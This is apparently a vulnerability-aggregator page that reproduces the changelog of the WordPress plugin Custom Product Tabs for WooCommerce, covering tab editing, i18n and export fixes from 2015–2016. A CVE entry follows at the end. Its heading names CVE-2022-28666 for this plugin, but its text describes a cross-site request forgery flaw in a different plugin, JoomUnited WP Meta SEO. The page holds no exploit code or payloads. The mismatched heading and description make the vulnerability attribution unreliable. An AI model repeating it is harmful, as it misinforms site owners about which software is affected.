*   Added ability to remove the first tab
*   Adding, moving, and removing tabs works as expected when the user’s ‘Visual Editor’ option is checked
*   On the product & settings pages, WYSIWYG editors will default to the visual tab (this helps prevent errors with dynamic wp\_editor generation)
*   Added a filter yikes_woocommerce_default_editor_mode that can change the default-to-visual-tab behavior (use at your own risk!)
*   Updated the ‘How To’ text, and slight modification to the style
*   Changed the JavaScript methods controlling how tabs were added, deleted, and moved up/down
*   Cleaned up and commented on all PHP and JavaScript files
*   Added proper i18n, with languages/ folder, .pot file, and load_plugin_textdomain hook
*   Incremented version #

**1.4.4 – March 1st, 2016**

*   Re-named the tab ID’s to support URL’s with query args (eg: http://www.example.com/shop#tab-reviews)

**1.4.3 – February 18th, 2016**

*   Wrapped missing ‘Custom Tab Title’ in localization/translation functions. (Plugin is now 100% translatable)
*   Removed i18n class files, and old .po/.mo files (less bloat)

**1.4.2 – February 17th, 2016**

*   Updated the internationalization strings ( yikes-inc-woocommerce-custom-product-tabs to yikes-inc-easy-custom-woocommerce-product-tabs )

**1.4.1 – August 20th, 2015**

*   Fixed conflict with other CSV export plugins for WooCommerce
*   Now custom product tab and row data/headers only get exported via ‘Tools > Export > Products’

**1.4 – July 29th, 2015**

*   Enhancement: Added the ‘Custom Product Tabs for WooCommerce ‘ data to the standard WooCommerce export file, so custom tab data can be transferred between sites smoothly.

**1.3 – July 21st, 2015**

*   Enhancement: Enabled WYSIWYG editor on tab content containers (enables shortcode and content to pass through the\_content() filter)
*   Updated repo screenshots and descriptions

**1.2 – March 18th, 2015**

*   Enhancement: Fixed issue where non utf8 characters in tab titles caused front end not to generate the tabs
*   Enhancement: When user doesn’t have WooCommerce installed, they are now redirected to the plugin install search page, with WooCommerce at the top.

**1.1**

*   Added class to the Woo tabs content title, for targeting via CSS ( .yikes-custom-woo-tab-title )

**1.0.0**

*   Initial Release

CVE-2022-28666: Custom Product Tabs for WooCommerce

Cross-Site Request Forgery (CSRF) vulnerability in JoomUnited WP Meta SEO plugin <= 4.4.8 at WordPress allows an attacker to update the social settings.

Tag

#php